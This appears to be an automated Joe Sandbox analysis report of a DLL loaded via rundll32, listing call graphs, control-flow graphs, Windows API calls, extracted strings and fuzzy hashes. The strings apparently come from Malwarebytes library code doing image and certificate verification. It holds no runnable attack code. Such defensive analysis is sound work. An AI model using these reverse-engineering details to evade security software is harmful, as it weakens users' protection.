LeaveCriticalSection 15451->15452 15454 18003cf94 15452->15454 15453->15447 15453->15451 15459 18003cf6d 15453->15459 15454->15447 15455 18003cfd5 15454->15455 15456 18003cfb0 15454->15456 15513 18003d6b0 15455->15513 15457 180036db0 29 API calls 15456->15457 15457->15447 15460 18003c3a0 LeaveCriticalSection 15459->15460 15460->15454 15461 18003d6b0 29 API calls 15462 18003cff5 15461->15462 15462->15447 15462->15461 15465 180046840 15463->15465 15464 1800468ad 15464->15348 15465->15464 15466 18007cf10 2 API calls 15465->15466 15467 180046899 15466->15467 15468 18003d0e0 29 API calls 15467->15468 15468->15464 15471 180099049 15469->15471 15472 1800990b4 15469->15472 15471->15472 15481 18003c240 15471->15481 15472->15366 15474 18004c1e5 15473->15474 15480 18004c211 15473->15480 15485 180032040 15474->15485 15476 18004c1ff 15477 180032040 13 API calls 15476->15477 15478 18004c208 15477->15478 15479 180032040 13 API calls 15478->15479 15479->15480 15480->15364 15482 18003c245 15481->15482 15484 18003c271 15481->15484 15483 18003c250 DeleteCriticalSection 15482->15483 15483->15484 15484->15472 15486 180032045 15485->15486 15487 180032078 15485->15487 15486->15487 15489 18003c550 15486->15489 15487->15476 15490 18003c555 15489->15490 15492 18003c5bb 15489->15492 15491 18011bf80 ctype 13 API calls 15490->15491 15491->15492 15492->15487 15494 18004c24c 15493->15494 15495 180036db0 29 API calls 15494->15495 15497 18004c294 15494->15497 15496 18004c28c 15495->15496 15496->15401 15497->15401 15499 18004c160 15498->15499 15500 18004c19f 15499->15500 15501 1800322c0 29 API calls 15499->15501 15500->15404 15502 18004c17b 15501->15502 15502->15500 15503 1800322c0 29 API calls 15502->15503 15504 18004c18d 15503->15504 15504->15500 15505 1800322c0 29 API calls 15504->15505 15505->15500 15507 180032f6a 15506->15507 15509 180032f8b 15507->15509 15510 180032ff5 15507->15510 15511 180032ff9 ctype 15507->15511 15508 180036db0 29 API calls 15508->15510 15509->15508 15510->15444 15511->15510 15512 18003c550 13 API calls 15511->15512 15512->15510 15514 18003d6c5 15513->15514 15515 18003d6e5 15514->15515 15518 18003d715 15514->15518 15516 180036db0 29 API calls 15515->15516 15517 18003d703 15516->15517 15517->15462 15519 18003d744 15518->15519 15520 180036db0 29 API calls 15518->15520 15519->15462 15520->15519 19496 180002b60 TlsAlloc 19497 180002b78 19496->19497 19498 180002b8b 19496->19498 19499 180106ae4 57 API calls 19497->19499 19501 180023340 std::bad_exception::bad_exception 62 API calls 19498->19501 19500 180106b29 19499->19500 19502 180002baf 19501->19502 19503 180108fa8 Concurrency::cancel_current_task 2 API calls 19502->19503 19504 180002bc0 19503->19504 19505 180022fa0 shared_ptr InitializeCriticalSectionAndSpinCount 19504->19505 19505->19497 14579 18012eb94 14585 18012eba5 _Getctype 14579->14585 14580 18012ebf6 14589 180124bfc 14580->14589 14581 18012ebda RtlAllocateHeap 14583 18012ebf4 14581->14583 14581->14585 14585->14580 14585->14581 14586 1801293dc 14585->14586 14592 18012941c 14586->14592 14598 18012ac28 GetLastError 14589->14598 14591 180124c05 14591->14583 14597 18012884c EnterCriticalSection 14592->14597 14599 18012ac4c 14598->14599 14600 18012ac69 FlsSetValue 14598->14600 14599->14600 14613 18012ac59 SetLastError 14599->14613 14601 18012ac7b 14600->14601 14600->14613 14615 18012eb94 14601->14615 14605 18012aca8 FlsSetValue 14607 18012acb4 FlsSetValue 14605->14607 14608 18012acc6 14605->14608 14606 18012ac98 FlsSetValue 14609 18012aca1 14606->14609 14607->14609 14628 18012a81c 14608->14628 14622 18012c690 14609->14622 14613->14591 14621 18012eba5 _Getctype 14615->14621 14616 18012ebf6 14618 180124bfc _Wcrtomb 10 API calls 14616->14618 14617 18012ebda RtlAllocateHeap 14619 18012ac8a 14617->14619 14617->14621 14618->14619 14619->14605 14619->14606 14620 1801293dc std::_Facet_Register 2 API calls 14620->14621 14621->14616 14621->14617 14621->14620 14623 18012c695 HeapFree 14622->14623 14624 18012c6c6 14622->14624 14623->14624 14625 18012c6b0 GetLastError 14623->14625 14624->14613 14626 18012c6bd __free_lconv_mon 14625->14626 14627 180124bfc _Wcrtomb 9 API calls 14626->14627 14627->14624 14633 18012a6f4 14628->14633 14645 18012884c EnterCriticalSection 14633->14645

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 180001d60-1800022a5 call 180008370 * 3 call 18013eb70 call 180008370 call 18013eb70 call 180008370 * 5 call 18013eb70 call 180008370 call 18013eb70 call 180106664 31 1800022b0-1800022d9 call 18001fba0 0->31 34 180002354-180002362 31->34 35 1800022db-1800022e2 31->35 34->31 38 180002368-18000238c call 180106e94 34->38 36 180002667-18000266c call 18001f070 35->36 37 1800022e8-18000234f call 180106664 call 180008d20 call 18001f920 35->37 45 18000266d-180002672 call 1801160ac 36->45 37->34 47 1800023cb-1800023d2 38->47 48 18000238e-18000239f 38->48 64 180002673-180002678 call 1801160ac 45->64 50 180002411-180002418 47->50 51 1800023d4-1800023e5 47->51 53 1800023a1-1800023b4 48->53 54 1800023ba-1800023c7 call 180106630 48->54 59 180002457-18000245e 50->59 60 18000241a-18000242b 50->60 56 1800023e7-1800023fa 51->56 57 180002400-18000240d call 180106630 51->57 53->54 61 180002661-180002666 call 1801160ac 53->61 54->47 56->45 56->57 57->50 69 18000249d-1800024a4 59->69 70 180002460-180002471 59->70 66 180002446-180002453 call 180106630 60->66 67 18000242d-180002440 60->67 61->36 79 180002679-18000267e call 1801160ac 64->79 66->59 67->64 67->66 72 1800024e3-1800024ea 69->72 73 1800024a6-1800024b7 69->73 77 180002473-180002486 70->77 78 18000248c-180002499 call 180106630 70->78 84 180002529-180002530 72->84 85 1800024ec-1800024fd 72->85 82 1800024d2-1800024df call 180106630 73->82 83 1800024b9-1800024cc 73->83 77->78 77->79 78->69 90 18000267f-180002684 call 1801160ac 79->90 82->72 83->82 83->90 87 180002532-180002543 84->87 88 18000256f-180002576 84->88 93 180002518-180002525 call 180106630 85->93 94 1800024ff-180002512 85->94 95 180002545-180002558 87->95 96 18000255e-18000256b call 180106630 87->96 97 1800025b5-1800025bc 88->97 98 180002578-180002589 88->98 102 180002685-18000268a call 1801160ac 90->102 93->84 94->93 94->102 95->96 104 18000268b-180002690 call 1801160ac 95->104 96->88 109 1800025fb-180002602 97->109 110 1800025be-1800025cf 97->110 106 1800025a4-1800025b1 call 180106630 98->106 107 18000258b-18000259e 98->107 102->104 117 180002691-180002696 call 1801160ac 104->117 106->97 107->106 107->117 114 180002634-180002656 109->114 115 180002604-180002618 109->115 119 1800025d1-1800025e4 110->119 120 1800025ea-1800025f7 call 180106630 110->120 126 180106b20-180106b24 call 180106ae4 114->126 123 18000261a-18000262d 115->123 124 18000262f call 180106630 115->124 128 180002697-1800026a4 call 1801160ac call 18001fe80 117->128 119->120 119->128 120->109 123->124 131 18000265b-180002660 call 1801160ac 123->131 124->114 138 180106b29-180106b36 126->138 141 1800026a9-1800026b4 128->141 131->61 141->126
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
      • String ID: )7CC$)7}$$-TES$4(P^$ANDA$EICA$H+H*$IRUS$L$LE!$$MSCF$NTIV$P%@A$PZX5$P[4\$R-ST$RD-A$Rar!$Rar!Rar!$T-FI$X5O!
      • API String ID: 3936042273-42239843
      • Opcode ID: 1a2d1d1cae48639a1bf825e4c12e92b31543beafbb8b1ed0150fcf9411e74a73
      • Instruction ID: f65e32fc1529cad7a00d9ef93ac9e0bce8ed8251db96144b5fa9cecdc263a2d9
      • Opcode Fuzzy Hash: 1a2d1d1cae48639a1bf825e4c12e92b31543beafbb8b1ed0150fcf9411e74a73
      • Instruction Fuzzy Hash: 41424973A11BC489EB61CF75E8843DD33A5F7887A8F208715EA981AB99DF74C284C740

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: MemoryVirtual$AllocateProtect
      • String ID: %$+$+$4$D$H$M$U$e$g$i$k$v$y$y$z
      • API String ID: 2931642484-2653694703
      • Opcode ID: 29ae91233c9e2a0f6e91985882b77d90a3ef669daaed8ef0da2c19573c3da0e6
      • Instruction ID: 65144e74e28f08dbd9014b17249a5266b53b2c5cc9101eb6481addb504c11909
      • Opcode Fuzzy Hash: 29ae91233c9e2a0f6e91985882b77d90a3ef669daaed8ef0da2c19573c3da0e6
      • Instruction Fuzzy Hash: C351D37220DBC486E7529764B40478AAB91E3897E8F544225F7D90BBC9DFBDC10DCB14
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ErrorFreeHeapLast
      • String ID:
      • API String ID: 485612231-0
      • Opcode ID: e1f295aa13e5ef76a22ddaed4986782ce05a382e3253e5ee7e8977a23b813279
      • Instruction ID: 944969eb6665ad90594a193c0f285eaebd773b5436d63678d6c4f0510345ffff
      • Opcode Fuzzy Hash: e1f295aa13e5ef76a22ddaed4986782ce05a382e3253e5ee7e8977a23b813279
      • Instruction Fuzzy Hash: 64419272310A5886EF85CF2AD91839973A2B74CFE0F49D026EE0D87B54EE7CC5498304
      Memory Dump Source
      • Source File: 00000006.00000003.2071018423.000002357C700000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002357C700000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_3_2357c700000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
      • Instruction ID: 93dc450cf14adf797917e7a542985136759fb69b637e32f4155183e02411b3fe
      • Opcode Fuzzy Hash: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
      • Instruction Fuzzy Hash: 86F0D1B0628B408BE3449F2884C9275B7E1FBD8645F20052EE889C7361CB3198428A43
      Memory Dump Source
      • Source File: 00000006.00000003.2071018423.000002357C700000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002357C700000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_3_2357c700000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
      • Instruction ID: 4c677bd9e44e8efc9e5a4b01f3a003a6f663c634b3678f0d9f0e16988c6a2b33
      • Opcode Fuzzy Hash: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
      • Instruction Fuzzy Hash: 7BF05470A24F444BD704AF2C884E67577D1F7E8645F54462EE848C7361DF35E5428B43

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Allocstd::bad_exception::bad_exception
      • String ID: cannot allocate thread context key
      • API String ID: 287486779-1710566765
      • Opcode ID: 70f5ec321c4b3483aab5bc5a2522a323dc813696c1eb10960a0e64ce664ba700
      • Instruction ID: 3eb9b5f93a8efaf96118b30193394a4e6d026d19488291b2ffbd53e73d27dd25
      • Opcode Fuzzy Hash: 70f5ec321c4b3483aab5bc5a2522a323dc813696c1eb10960a0e64ce664ba700
      • Instruction Fuzzy Hash: 6A014F7172090DD1E692FB34E89A3D87365BB9D368FD08112D14D825F6DE28C75EC700

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Startupstd::bad_exception::bad_exception
      • String ID: Failed to initialize network subsystem
      • API String ID: 36264510-1820565237
      • Opcode ID: 352e269cbea8bc61e3b80d515c178517ace928a2895d31e5eb89a4d4d5db4166
      • Instruction ID: 2ad56a504399f77fca66a98e9298a4838375de0c8b08391d47cfbd9bbf6bfd2d
      • Opcode Fuzzy Hash: 352e269cbea8bc61e3b80d515c178517ace928a2895d31e5eb89a4d4d5db4166
      • Instruction Fuzzy Hash: B1F03772214D4DD1EBA1EB14E8893E96363F799354FC09025A28D478BBEE6CC70DCB00
      Strings
      Memory Dump Source
      • Source File: 00000006.00000003.2071018423.000002357C700000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002357C700000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_3_2357c700000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
      • Instruction ID: 5a8696f8cb31675befd9a6e4a6c6ad19b1061a4bb057142c23aa6df9f1f141d1
      • Opcode Fuzzy Hash: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
      • Instruction Fuzzy Hash: 66B17171218A488FEB54EF1CC885BAAB7E1FB98310F50466DE48EC7251DB34E945CB82
      APIs
      Memory Dump Source
      • Source File: 00000006.00000003.2071018423.000002357C700000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002357C700000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_3_2357c700000_rundll32.jbxd
      Similarity
      • API ID: AllocateHeap
      • String ID:
      • API String ID: 1279760036-0
      • Opcode ID: dda5bd23e4ac47bd42f6dd929fb15fd9a0e68714a6453c9134859c40f5c4eed3
      • Instruction ID: 3ad2c28ad2edaddaace38580ba8383bd6f9fdd329f53f8b60d54cc3cc6004116
      • Opcode Fuzzy Hash: dda5bd23e4ac47bd42f6dd929fb15fd9a0e68714a6453c9134859c40f5c4eed3
      • Instruction Fuzzy Hash: 3C012D30619D7A0BF7D9A76968C5BE1B6C5F794310F644159DC0EC7286DD29CE414380

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 202 18013400c-18013401f 203 180134021-180134029 call 18012c6cc 202->203 204 18013402b-18013402e 202->204 212 18013404a-180134054 203->212 206 180134037-18013403b 204->206 207 180134030-180134035 call 18012c690 204->207 210 18013406a-180134082 RtlReAllocateHeap 206->210 211 18013403d-180134042 call 180124bfc 206->211 218 180134048 207->218 213 180134084 210->213 214 180134055-18013405c call 180139d1c 210->214 211->218 213->212 214->211 221 18013405e-180134068 call 1801293dc 214->221 218->212 221->210 221->211
      APIs
        • Part of subcall function 000000018012C6CC: HeapAlloc.KERNEL32(?,?,00000000,0000000180126ECB), ref: 000000018012C70A
      • RtlReAllocateHeap.NTDLL(?,?,00000000,000000018012A65B,?,?,?,000000018012A0B7,?,?,?,0000000180129FAD,?,?,?,000000018012A38E), ref: 0000000180134079
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Heap$AllocAllocate
      • String ID:
      • API String ID: 2177240990-0
      • Opcode ID: cbf9e1bcc966571a6f1044025fffae21e333bb6e3deebf2d98a299e414a4521b
      • Instruction ID: f695400d6f30680e5f9617c48cc471e8a6d1151c8eb51c0e9e368cd19eb7ef02
      • Opcode Fuzzy Hash: cbf9e1bcc966571a6f1044025fffae21e333bb6e3deebf2d98a299e414a4521b
      • Instruction Fuzzy Hash: 7E016D7230060942FEDAAB6165893EA13915B8C7F0F1AD221BB25462D6DE2CD6084700

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 224 18012eb94-18012eba3 225 18012ebb3-18012ebc3 224->225 226 18012eba5-18012ebb1 224->226 228 18012ebda-18012ebf2 RtlAllocateHeap 225->228 226->225 227 18012ebf6-18012ec01 call 180124bfc 226->227 233 18012ec03-18012ec08 227->233 229 18012ebf4 228->229 230 18012ebc5-18012ebcc call 180139d1c 228->230 229->233 230->227 236 18012ebce-18012ebd8 call 1801293dc 230->236 236->227 236->228
      APIs
      • RtlAllocateHeap.NTDLL(?,?,00000000,000000018012AC8A,?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012EBE9
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: AllocateHeap
      • String ID:
      • API String ID: 1279760036-0
      • Opcode ID: 1bbd031e9b40aaa3df7e7cfd2382faa7c78f8fa622478c522076619262ec1d53
      • Instruction ID: 2f222e57a63ab880ed9cbf42d716b4e0d6c647b669ae0dc4a7462a43906732ee
      • Opcode Fuzzy Hash: 1bbd031e9b40aaa3df7e7cfd2382faa7c78f8fa622478c522076619262ec1d53
      • Instruction Fuzzy Hash: 16F01DB530260946FEE7D6A999593D513D55B4EBA0F0CD4309D0F863D6EE5DC6884310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Handle$CloseErrorLast$Module$AddressCreateProcSnapshotToolhelp32$FirstLibraryLoadModule32OpenProcessQuerySleepVirtual
      • String ID: Crypto$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\Crypto.cpp$Failed to load psapi.dll = %u$GetModuleInformation$GetModuleInformation = %p$ImageNotify: Image has unusual memory protection!! %u - %s$ImageNotify: Image has unusual memory protection!! (%zu) (%u) PID = %u - %s$K32GetModuleInformation$K32GetModuleInformation = %p$VerifyImage Failed to open the process %u- %u$VerifyImage failed to get base address from module handle %u (GetModInfo = %p)$VerifyImage failed to get module handle - %u$VerifyImage failed to get module information - %u$VerifyImage got base address from module handle %p$kernel32.dll$mb::common::crypto::VerifyImage$psapi.dll
      • API String ID: 1552750388-2544890722
      • Opcode ID: cbc42031f762b81ed146b49916ee564eac4c9e52cfbada4c05aeaa6be7a08a72
      • Instruction ID: 788443a6203ae7b63ad1ef169ede3e5baaab21628117a0fbacbdca54153a5daf
      • Opcode Fuzzy Hash: cbc42031f762b81ed146b49916ee564eac4c9e52cfbada4c05aeaa6be7a08a72
      • Instruction Fuzzy Hash: B4E12876204B4882E7A2CF11F8887D977A5F78CBA5F448116EA8E477A5DF38C60DCB04
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Crypt$AlgorithmProvider$CloseDestroyOpen
      • String ID: $**** Error 0x%x returned by BCryptOpenAlgorithmProvider$****> Failed to import public key - %x$0$@$ConnectW$ConnectWise certificate is trusted!$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\CryptoUser.cpp$Failed to import the public key - %x$ImportRsaPublicKeyX$Kaseya Limited$Kaseya certificate is trusted!$MD5$Malwareb$MbCommonSigCRYPTUSR$RSA$RSAPUBLICBLOB$SHA1$SHA256$SHA384$SHA512$VerifyTrusted$ise, Inc$ytes
      • API String ID: 2054559242-2717880233
      • Opcode ID: cc0a3cb7e0da9c7ff66ae0a5c9362b601b2ca27709e9a57ede8521292f8f2120
      • Instruction ID: 91263c3910ef83fdbdd24a69e8ba3a9f61853925db0fc0cbaca4464654ca9d14
